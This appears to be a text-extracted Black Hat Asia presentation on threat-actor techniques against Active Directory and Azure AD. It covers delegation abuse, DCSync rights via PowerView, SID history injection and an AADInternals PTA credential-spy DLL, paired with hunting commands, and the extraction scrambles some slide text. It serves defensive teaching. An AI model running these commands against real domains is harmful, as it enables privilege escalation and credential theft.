Professional Documents
Culture Documents
Environment”
#BHASIA @BLACKHATEVENTS
What will we talk about today?
• Hypothesis based on Threat Actor TTPs
targeting Active Directory environment
• How Threat Actor abuse Active Directory
• Hunt and Detect Threat Actors TTPs
3
Persistence using Machine$ hash
• Un-Constrained
• Constrained
user • Resource Based Constrained
Backend Server
Database Server
Service B
Target Domain
Controller
@Khannaanurag, @Th1rum #BHASIA @BLACKHATEVENTS
Constrained Delegation with Protocol Transition
AD DC PS> Get-ADComputer -Identity <ServiceA> | Set-
ADAccountControl -TrustedToAuthForDelegation $true
ServiceA PS>
Reflection.Assembly]::LoadWithPartialName('System.IdentityMode
l') | out-null
ServiceA PS> $idToImpersonate = New-
Object System.Security.Principal.WindowsIdentity
@(‘<DomainAdmin>')
ServiceA PS> $idToImpersonate.Impersonate()
user 5. T
A im p
Service A e rs
on
a te
sD
At
oc
on
ne
ct
to
ta r
ge
tD
C
Service B
Target Servers
/Domain Controller
@Khannaanurag, @Th1rum #BHASIA @BLACKHATEVENTS
*Available in Windows Server 2012 or higher
Resource-based Constrained Delegation
Threat Actor only requires capability to edit “msDS-
AllowedToActOnBehalfOfOtherIdentity” on the target computer object.
ServiceA PS>
Reflection.Assembly]::LoadWithPartialName('System.IdentityMode
l') | out-null
ServiceA PS> $idToImpersonate = New-
Object System.Security.Principal.WindowsIdentity
@(‘<DomainAdmin>')
ServiceA PS> $idToImpersonate.Impersonate()
PS > . .\PowerView.ps1
Request for hash “domain/krbtgt” PS > Add-ObjectAcl -TargetDistinguishedName
"dc=ThreatHunting,dc=dev" -PrincipalSamAccountName <username>
Krbtgt hash response -Rights DCSync -Verbose
Threat Actor
Threat Actor Workflow
1131f6aa-9c07-11d1-f79f-00c04fc2dcd2 (DS-Replication-Get-Changes)
1131f6ad-9c07-11d1-f79f-00c04fc2dcd2 (DS-Replication-Get-Changes-All)
DS Replication Rights-GUID
1
Threat Actor enabled script execution
2
Disabled logon script delays
3
Disabled end point security software
4
Used Logon scripts to deploy ransomware
Add privileged rights to standard users like Debug Program, Extract User Rights assignment settings and review for privileged
Remote Desktop Services, Backup files and directories, Log on access
Locally (DCs)
Deploy startup/shutdown, Logon/Logoff scripts Review scripts configured for execution
Create restricted groups and add it as member of built-in Review restricted groups and privileges
privileged groups
Enable weak algorithms (Wdigest, LMHash, Credential Manager Review registry hardening settings
eg) and extract hashes
HKLM\System\CurrentControlSet\Control\SecurityProviders\WD
igest\UseLogonCredential
HKLM\System\CurrentControlSet\Control\Lsa\NoLmHash
HKLM\System\CurrentControlSet\Control\Lsa\disabledomaincre
ds
Limit Machine$ Account password change Review registry entry for password change
HKLM:\SYSTEM\CurrentControlSet\Services\netlogon\Parameter
s\MaximumPasswordAge
HKLM:\SYSTEM\CurrentControlSet\Services\netlogon\Parameter
s\DisablePasswordChange
@Khannaanurag, @Th1rum #BHASIA @BLACKHATEVENTS
5. Cross Forest Trust abuse using SID History
SID History
• Disabled by default
• Enabled to support migration scenarios
• Contain previous SIDs used for the object
• If enabled SID Filtering will block 500-1000 RID Principals to cross trust
@Khannaanurag, @Th1rum #BHASIA @BLACKHATEVENTS
Cross Forest Trust abuse using SID History
Forest-B Actions
Forest Trust – SID History Enabled DC Forest-B PS> Netdom trust <Forest-B> /domain:<Forest-
SID History injected in user
account properties A>/enablesidhistory:yes
Attack Workflow
@Khannaanurag, @Th1rum #BHASIA @BLACKHATEVENTS
Hunting for SID History
Detection Hunting
DC Forest-A PS> Get-ADUser -Filter "SIDHistory -like '*'" -
Properties SIDhistory | Where {$_.SIDHistory -NotLike ”ForestA-
SID*"}
6
Agent decrypts 7 Agent validates credentials against AD
password using
its private key 8 AD returns result
AD
AAD Connect
On-Premises
AAD Connect running Pass Through Authentication (PTA).
@Khannaanurag, @Th1rum #BHASIA @BLACKHATEVENTS
Attacking Azure AD PTA AADConnect PS > Import-Module AADInternals
AADConnect PS > Install-AADIntPTASpy
2 User redirected to AAD
4
1. TA injects malicious DLL in “AzureADConnectAuthenticationAgentService”
3 User enters credentials 4. Credentials
placed on a
1 0 AAD completes the process AADConnect PS > Get-AADIntPTASpyLog
queue
6
Agent decrypts 7 Agent validates credentials against AD
password using
its private key 8 AD returns result
AAD Connect
AD Threat Actor Workflow
On-Premises
@Khannaanurag, @Th1rum
AAD Connect running Pass Through Authentication (PTA). #BHASIA @BLACKHATEVENTS
Hunting for AAD PTA Spy
Protect AAD Connect server as a Tier0 asset & Enable MFA
Detection Hunting
AAD Connect PS> Get-Process
AzureADConnectAuthenticationAgentService | Select-Object -
ExpandProperty Modules
Thirumalai Natarajan
@Th1rum
www.linkedin.com/in/thirumalainatarajan